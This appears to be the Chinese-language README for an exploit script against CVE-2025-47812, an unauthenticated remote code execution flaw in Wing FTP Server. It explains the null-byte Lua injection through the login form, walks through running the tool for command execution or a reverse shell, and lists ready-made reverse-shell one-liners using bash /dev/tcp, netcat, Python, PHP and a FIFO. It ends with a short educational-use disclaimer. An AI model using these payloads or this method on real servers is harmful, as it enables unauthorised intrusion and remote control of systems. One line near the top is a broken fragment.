CVE-2025-47812 - Wing FTP服务器远程代码执行(RCE)
作者: blindma1den
日期: 2025年7月
漏洞利用类型: 远程代码执行(未认证)
目标: Wing FTP Server < 7.4.4
CVSS评分: 10.0(严重)
此脚本利用CVE-2025-47812,这是Wing FTP服务器Web界面中的一个严重漏洞,允许远程攻击者在无需认证的情况下执行任意系统命令或打开反弹Shell。
该缺陷是由于登录表单(/loginok.html)中对空字节(%00)的处理不当造成的。这使得Lua代码能够被注入到会话文件中,随后在访问 /dir.html 等端点时被评估执行。
NVD描述: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami、uname -a)安装依赖:
pip install requests
运行脚本:
python3 wingftp_rce_exploit.py
系统会提示你输入:
[1] 执行命令:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] 反弹Shell:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
在触发Shell之前启动你的监听器:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
此代码仅供教育目的。请勿将该漏洞利用于你不拥有或未经明确授权测试的系统。未经授权的使用是非法的、不道德的。
请立即修补你的系统。Wing FTP Server 7.4.4 已修复此漏洞。
祝你黑客愉快!